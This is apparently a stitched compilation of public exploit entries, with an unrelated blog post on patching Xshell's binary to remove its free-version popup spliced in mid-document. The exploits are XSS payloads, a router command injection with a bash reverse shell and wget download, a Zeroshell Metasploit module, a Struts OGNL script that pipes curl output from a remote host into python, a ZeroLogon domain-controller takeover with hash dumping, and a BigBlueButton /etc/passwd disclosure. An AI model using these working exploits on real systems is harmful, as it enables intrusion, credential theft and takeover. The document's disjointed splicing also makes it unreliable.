4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>"
5. Now click on Update button.
6. The XSS will be triggered.
POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 335
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/Admin/ScheduleTask/List
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: xyz
Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA
# Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)
# Date: 5 Aug 2020
# Exploit Author: maj0rmil4d
# Vendor Homepage: http://www.seowonintech.co.kr/en/
# Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
# Version: 1.0.11 (Possibly all versions)
The default user/pass is admin/admin
your commands run as root user
the vulnerablity is on the ipAddr parameter in system_log.cgi
Usage:
login to the dashboard.
setup your listener.
download the revshell.txt with the RCE
run the revshell.txt
* here is the RCE request :
POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
00101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t201802140812
Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
4662; cpe_loginadmin; _lang
CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
&pingTimeout30&pingCount4&ipAddr;id&maxTTLCnt30&queriesCnt3&=
reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
* to get a reverse shell, setup the listener and download the file on the r=
outer then run it .
* the content of the revshell.txt :
bash -i >& /dev/tcp/192.168.1.10/45214 0>&1
* to download :
POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
00101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t201802140812
Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
4662; cpe_loginadmin; _lang
CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
&pingTimeout30&pingCount4&ipAddr;wget http://192.168.1.10/revshell=
.txt&maxTTLCnt30&queriesCnt3&reportIpOnlyCheckboxon&btnApplyApp=
ly&T1596644096617
* to run it :
POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
00101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t201802140812
Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
4662; cpe_loginadmin; _lang
CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
&pingTimeout30&pingCount4&ipAddr;bash revshell.txt&maxTTLCnt30&=
queriesCnt3&reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Zeroshell 3.9.0 Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability
found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url.
As sudo is configured to execute /bin/tar without a password (NOPASSWD)
it is possible to run root commands using the "checkpoint" tar options.
},
'Author' => [
'Juan Manuel Fernandez', # Vulnerability discovery
'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
],
'References' => [
['CVE', '2019-12725'],
['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
],
'DisclosureDate' => 'Jul 17 2019',
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => [ 'unix', 'linux' ],
'Arch' => [ ARCH_X86 ],
'Targets' => [
['Zeroshell 3.9.0 (x86)', {
'Platform' => 'linux',
'Arch' => ARCH_X86,
}],
],
'DefaultTarget' => 0,
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
])
end
def execute_command(cmd, opts = {})
command_payload = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"
print_status("Sending stager payload...")
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/kerbynet',
'encode_params' => false,
'vars_get' => {
'Action' => 'x509view',
'Section' => 'NoAuthREQ',
'User' => '',
'x509type' => command_payload
}
)
return res
end
def filter_bad_chars(cmd)
cmd.gsub!(/chmod \+x/, 'chmod 777')
cmd.gsub!(/;/, " %0A ")
cmd.gsub!(/ /, '+')
cmd.gsub!(/\//, '%2F')
return cmd
end
def check
res = execute_command('id')
if res && res.body.include?("uid=0(root)")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_status("Exploiting...")
execute_cmdstager(flavor: :wget, delay: 5)
end
end
# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
# Google Dork: "Apache OpenMeetings DOS"
# Date: 2020-08-28
# Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research)
# Vendor Homepage: https://openmeetings.apache.org/
# Software Link: https://openmeetings.apache.org/
# Version: 4.0.0 - 5.0.0
# Tested on: Windows
# CVE: CVE-2020-13951
- POC:
# Vulnerability variable: hostname
# Payload: x.x.x.x;ls
# Request exploit:
GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026
- Reference:
https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E
https://nvd.nist.gov/vuln/detail/CVE-2020-13951
# Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting (Authenticated)
# Date: 24-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: 3.0.3.6
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29471
Vulnerable Parameters: Profile Image.
Steps-To-Reproduce:
1. Go to the opencart admin page.
2. Now go to the profile page.
* Before the next step write this in notepad ""><svg onload=alert("XSS")>" and save it as an payload.png
3. Now edit the image and uplaod the image as payload.png.
4. The XSS will be triggered.
# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation
# Date: 08/18/2020
# Exploit Author: West Shepherd
# Vendor Homepage: https://struts.apache.org/download.cgi
# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)
# CVE : CVE-2019-0230
# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.
# Source(s):
# https://github.com/PrinceFPF/CVE-2019-0230
# https://cwiki.apache.org/confluence/display/WW/S2-059
# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22
# !/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import logging
class Exploit:
def __init__(
self,
target='',
redirect=False,
proxy_address=''
):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
self.target = target
self.session = requests.session()
self.redirect = redirect
self.timeout = 0.5
self.proxies = {
'http': 'http://%s' % proxy_address,
'https': 'http://%s' % proxy_address
} \
if proxy_address is not None \
and proxy_address != '' else {}
self.query_params = {}
self.form_values = {}
self.cookies = {}
boundary = "---------------------------735323031399963166993862150"
self.headers = {
'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
'Accept': '*/*',
'Connection': 'close'
}
payload = "%{(#nike='multipart/form-data')." \
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
"(#_memberAccess?(#_memberAccess=#dm):" \
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
\
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
\
"(#ognlUtil.getExcludedPackageNames().clear())." \
"(#ognlUtil.getExcludedClasses().clear())." \
"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \
"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
\
"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
"(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \
"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()."
\
"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
\
"(#ros.flush())}"
self.payload = "--%s\r\nContent-Disposition: form-data;
name=\"foo\"; " \
"filename=\"%s\0b\"\r\nContent-Type:
text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % (
boundary, payload, boundary
)
def do_get(self, url, params=None, data=None):
return self.session.get(
url=url,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
data=data,
params=params
)
def do_post(self, url, data=None, params=None):
return self.session.post(
url=url,
data=data,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
params=params
)
def debug(self):
try:
import http.client as http_client
except ImportError:
import httplib as http_client
http_client.HTTPConnection.debuglevel = 1
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
return self
def send_payload(self, command='curl --insecure -sv
https://10.10.10.10/shell.py|python -'):
url = self.target
stdout.write('sending payload to %s payload %s' % (url, command))
resp = self.do_post(url=url, params=self.query_params,
data=self.payload.replace('{COMMAND}', command))
return resp
if __name__ == '__main__':
parser = argparse.ArgumentParser(add_help=True,
description='CVE-2020-0230 Struts
2 exploit')
try:
parser.add_argument('-target', action='store', help='Target
address: http(s)://target.com/index.action')
parser.add_argument('-command', action='store',
help='Command to execute: touch /tmp/pwn')
parser.add_argument('-debug', action='store', default=False,
help='Enable debugging: False')
parser.add_argument('-proxy', action='store', default='',
help='Enable proxy: 10.10.10.10:8080')
if len(argv) == 1:
parser.print_help()
exit(1)
options = parser.parse_args()
exp = Exploit(
proxy_address=options.proxy,
target=options.target
)
if options.debug:
exp.debug()
stdout.write('target %s debug %s proxy %s\n' % (
options.target, options.debug, options.proxy
))
result = exp.send_payload(command=options.command)
stdout.write('Response: %d\n' % result.status_code)
except Exception as error:
stderr.write('error in main %s' % str(error))
xshel and xftp are one of my favorite and common tools. Many advantages have been improved since Xshell upgraded to the seventh version. Because my cousin refused to accept life, he could only use the free version. However, after using the free version, there will be a pop-up window of free declaration. I cannot tolerate this for patients with obsessive-compulsive disorder. This article solves this problem through our assembly method!
Beginner
Since it is a pop-up window, many security tools have the function of pop-up blocking. (360 Turquoise Tencent Butler) both contain this function. So we just need to intercept it.
Here, we have Tencent as an example.
Set the following to intercept immediately!
But at the moment the software is closed, something will come out. (Of course this is also something that patients with obsessive-compulsive disorder cannot tolerate)
Assembly Decompile
Required Compilation Tool 010Editor
Official website download https://www.sweetscape.com/010editor/
Download the 010Editor binary modification tool, free trial for 30 days, enough.
Be careful to backup first! 010Editor Open xshell.exe, search globally 74 11 6A 00 6A 07 6A 01, change the beginning 74 to EB (note that it is capitalized) and save 
Effect
Video Explanation
# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege
# Date: 2020-10-04
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2
# Tested on: Microsoft Windows Server 2016 Standard x64
# CVE : CVE-2020-1472
# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code
# Sources: https://www.secura.com/pathtoimg.php?id=2055
# Requirements: python3 and impacket 0.9.21+ (tested using this version)
#!/usr/bin/env python3
import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs
from binascii import hexlify, unhexlify
from subprocess import check_call
from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
from impacket.dcerpc.v5 import nrpc, epm, transport
from impacket import crypto, version
from impacket.examples import logger
from Cryptodome.Cipher import AES
from struct import pack, unpack
from impacket.dcerpc.v5.rpcrt import DCERPCException
class Exploit:
def __init__(
self,
name='',
address='',
attempts=2000,
password=''
):
name = name.rstrip('$')
self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\
.ServerSecureChannel
self.authenticator = self.getAuthenticator(stamp=0)
self.clearNewPasswordBlob = b'\x00' * 516
self.primaryName = ('\\\\%s' % name) + '\x00'
self.accountName = ('%s$' % name) + '\x00'
self.computerName = name + '\x00'
self.clientCredential = b'\x00' * 8
self.clientChallenge = b'\x00' * 8
self.negotiateFlags = 0x212fffff
self.address = address
self.max = attempts
self.dce = None
self.sessionKey = None
self.clientStoredCredential = None
self.password = password
def encodePassword(self, password):
if isinstance(password, str):
password = password.encode('utf-8')
return b'\x00' * (512 - len(password))\
+ password \
+ pack('<L', len(password))
def getAuthenticator(self, creds=b'\x00' * 8, stamp=10):
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = creds
authenticator['Timestamp'] = stamp
return authenticator
def serverReqChallenge(self):
try:
binding = epm.hept_map(
self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'
)
self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
self.dce.connect()
self.dce.bind(nrpc.MSRPC_UUID_NRPC)
return nrpc.hNetrServerReqChallenge(
self.dce,
self.primaryName,
self.computerName,
self.clientChallenge
)
except BaseException as ex:
self.logError(ex)
def serverAuthenticate(self):
try:
auth = nrpc.hNetrServerAuthenticate3(
self.dce,
self.primaryName,
self.accountName,
self.secureChannelType,
self.computerName,
self.clientCredential,
self.negotiateFlags
)
assert auth['ErrorCode'] == 0
self.logInfo('successfully authenticated')
return True
except nrpc.DCERPCSessionError as ex:
self.dce = None
if ex.get_error_code() == 0xc0000022:
return None
else:
self.logFail(ex.get_error_code())
except BaseException as ex:
self.dce = None
self.logFail(ex)
self.dce = None
def serverPasswordSet(self):
try:
return nrpc.hNetrServerPasswordSet2(
self.dce,
self.primaryName,
self.accountName,
self.secureChannelType,
self.computerName,
self.authenticator,
self.clearNewPasswordBlob
)
except BaseException as ex:
self.logError(ex)
def authenticate(self):
self.logInfo(
'checking target, attempting to authenticate %d max
attempts' % self.max
)
for attempt in range(0, self.max):
self.logInfo('attempt %d' % attempt)
self.serverReqChallenge()
self.serverAuthenticate()
if self.dce is not None:
break
if self.dce:
return True
else:
self.logError('failed to authenticate')
def exploit(self):
self.logInfo('attempting password reset')
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully reset password')
else:
self.logError('failed to reset password')
return self
def ComputeNetlogonCredentialAES(self, challenge):
return nrpc.ComputeNetlogonCredentialAES(
challenge,
self.sessionKey
)
def logInfo(self, message):
sys.stdout.write("[+] %s\n" % str(message))
return self
def logError(self, message):
sys.stderr.write("[-] error %s\n" % str(message))
def logFail(self, message):
sys.stderr.write("[!] failure %s\n" % str(message))
sys.exit(2)
def restore(self):
self.logInfo('attempting to restore password')
self.clientChallenge = b'12345678'
try:
self.primaryName = NULL
challenge = self.serverReqChallenge()
self.sessionKey = nrpc.ComputeSessionKeyAES(
'', self.clientChallenge, challenge['ServerChallenge']
)
self.clientCredential = self.ComputeNetlogonCredentialAES(
self.clientChallenge
)
try:
self.serverAuthenticate()
except Exception as e:
if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
raise
self.logInfo('restoring password')
self.clientStoredCredential = pack('<Q', unpack('<Q',
self.clientCredential)[0] + 10)
self.authenticator = self.getAuthenticator(
creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)
)
self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(
self.encodePassword(self.password)
)
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully restored password')
else:
self.logError('failed to restore password')
except Exception as ex:
self.logError(ex)
return self
if __name__ == '__main__':
info = """
NOTE - Exploitation will break the DC until restored, recommended guidelines:
1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:
cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>
2. Exploit the DC - this will break the DC until restored:
cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>
3. Dump the DC - for the DA hashes, this will not contain the
machine hex-pass:
secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP>
4. Dump the DC again - use the DA hash to get the machines hex-pass:
secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>
5. Restore target - this fixes the DC:
cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>
-hex <HEXPASS>
"""
parser = argparse.ArgumentParser(
description='CVE-2020-1472 ZeroLogon Exploit - Netlogon
Elevation of Privilege',
add_help=True
)
try:
parser.add_argument('-do', default='check', action='store',
help='What to do (default check):
[check|restore|exploit]')
parser.add_argument('-target', action='store',
help='NETBIOS name of target DC (not the FQDN)')
parser.add_argument('-ip', action='store',
help='IP address of target DC')
parser.add_argument('-password', default='', action='store',
help='The plaintext password to use to
reset the DC')
parser.add_argument('-hex', default='', action='store',
help='The hex password to use to restore
the DC (recommended)')
parser.add_argument('-max', default=2000, action='store',
help='Max attempts to authenticate with
the DC (usually ~300 or less)')
if len(sys.argv) < 3:
parser.print_help()
print(info)
sys.exit(1)
options = parser.parse_args()
if options.do.lower() == 'check':
Exploit(
name=options.target,
address=options.ip,
attempts=int(options.max)
).authenticate()
elif options.do.lower() == 'exploit':
exp = Exploit(
name=options.target,
address=options.ip,
attempts=int(options.max)
)
if exp.authenticate():
exp.exploit()
elif options.do.lower() == 'restore':
if options.hex != '' and options.password == '':
options.password = unhexlify(options.hex)
if options.password != '':
exp = Exploit(
name=options.target,
address=options.ip,
password=options.password
).restore()
else:
parser.print_help()
except Exception as error:
sys.stderr.write('[-] error in main %s\n' % str(error))
# Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery
# Date: 2020-09-11
# Exploit Author: RedTeam Pentesting GmbH
# Vendor Homepage: https://bigbluebutton.org/
# Version: BigBlueButton 2.2.25
RedTeam Pentesting discovered a vulnerability in the BigBlueButton web
conferencing system which allows participants of a conference with
permissions to upload presentations to read arbitrary files from the
file system and perform server-side requests. This leads to
administrative access to the BigBlueButton instance.
Details
=======
Product: BigBlueButton
Affected Versions: 2.2.25, potentially earlier versions as well
Fixed Versions: 2.2.27
Vulnerability Type: Arbitrary File Disclosure and
Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://bigbluebutton.org/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005
Advisory Status: published
CVE: CVE-2020-25820
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820
Introduction
============
"BigBlueButton is a web conferencing system designed for online
learning."
(from the vendor's homepage)
More Details
============
BigBlueButton is a web conferencing system that allows participants with
the appropriate privileges to upload files in various formats to be used
as presentation slides. Among other formats, BigBlueButton accepts
LibreOffice documents[1]. LibreOffice documents use the XML-based Open
Document Format for Office Applications (ODF)[2]. For technical
purposes, uploaded files are converted to PDF format with LibreOffice
and afterwards to SVG for displaying[6].
The ODF file format supports using the XML Linking Language (XLink) to
create links between documents[3]. When local files are referenced using
XLinks, the contents of the respective files are included in the
generated PDF file when BigBlueButton converts ODF documents with
LibreOffice. This leads to an arbitrary file disclosure vulnerability,
allowing malicious participants of conferences to extract files from the
BigBlueButton server's file system.
LibreOffice also embeds XLinks to remote locations when a document is
converted, which allows to perform server-side requests.
Proof of Concept
================
Start from an empty ODF Text Document and extract the content:
$ mkdir tmp-doc && cd tmp-doc
$ unzip ../empty.odt
Archive: empty.odt
extracting: mimetype
creating: Configurations2/accelerator/
creating: Configurations2/images/Bitmaps/
creating: Configurations2/toolpanel/
creating: Configurations2/progressbar/
creating: Configurations2/statusbar/
creating: Configurations2/toolbar/
creating: Configurations2/floater/
creating: Configurations2/popupmenu/
creating: Configurations2/menubar/
inflating: manifest.rdf
inflating: meta.xml
inflating: settings.xml
extracting: Thumbnails/thumbnail.png
inflating: styles.xml
inflating: content.xml
inflating: META-INF/manifest.xml
Replace the <office:body> element in the file content.xml with the
following:
<office:body>
<office:text>
<text:section text:name="string">
<text:section-source
xlink:href="file:///etc/passwd"
xlink:type="simple"
xlink:show="embed"
xlink:actuate="onLoad"/>
</text:section>
</office:text>
</office:body>
The text document now includes a section that references the external
file /etc/passwd. Create an new ODF Text Document with the modified
content:
$ zip -r ../modified.odt *
The document can now be uploaded as a presentation. After the
conversion, the presentation shows the contents of the file
/etc/passwd from the system running the BigBlueButton conferencing
software. To perform server-side requests, substitute the xlink:href
attribute's value with a remote URL such as http://example.com:
<office:body>
<office:text>
<text:section text:name="string">
<text:section-source
xlink:href="http://example.com"
xlink:type="simple"
xlink:show="embed"
xlink:actuate="onLoad"/>
</text:section>
</office:text>
</office:body>
When converting a document with this content, LibreOffice will fetch the
website's content and embed it into the generated PDF file.
Workaround
==========
To work around this issue, the conversion feature should be disabled if
it is not used. Otherwise, permission to upload presentations should
only be given to trusted users. Additionally, the allowed file types for
upload can be restricted to just PDF files.
Fix
===
Update to fixed version 2.2.27. Change API key after update.
Security Risk
=============
As shown, the presentation conversion feature of BigBlueButton can be
used to disclose arbitrary local files. Through the file disclosure,
attackers can gain access to the credentials of the BigBlueButton
instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties,
/usr/share/bbb-apps-akka/conf/application.conf), which allows for
administrative access to BigBlueButton through its API (see [5]),
including all conferences.
Additionally, it is possible to perform server-side requests. Note that
this vulnerability is different from CVE-2018-10583 [4], because the
risk is not the disclosure of credentials sent while fetching remote
resources, but the ability to access resources that are in the same
network segment as the BigBlueButton instance, which is possibly not
accessible from the Internet.
To exploit this vulnerability, attackers need to have access to a
conference with the ability to upload presentations. While successful
exploitation of this vulnerability would pose severe consequences for
the affected BigBlueButton instance, it is only rated to pose a medium
risk due to the requirement of having presentator access.
Timeline
========
2020-09-11 Vulnerability identified
2020-09-18 Customer approved disclosure to vendor
2020-09-22 CVE ID requested
2020-09-22 CVE ID assigned
2020-09-24 Requested encrypted communication with vendor
2020-09-25 Vendor unable to provide encrypted communication,
Vendor notified
2020-09-25 Vendor confirmed being able to reproduce vulnerability,
mentioned similar bugreport
2020-09-25 Requested information whether "similar burgreport"
uses the same vulnerability - no answer
2020-10-13 Again requested information whether "similar burgreport"
uses the same vulnerability, whether release shedule is
known - no answer
2020-10-14 Vendor released fixed version (without mentioning vulnerability)
2020-10-21 Vulnerability published by third party [7]
2020-10-21 Advisory released
References
==========
[1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton
[2] http://opendocumentformat.org/
[3] https://www.w3.org/TR/xlink11/
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
[5] https://docs.bigbluebutton.org/dev/api.html#usage
[6] https://docs.bigbluebutton.org/support/faq.html#presentations
[7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen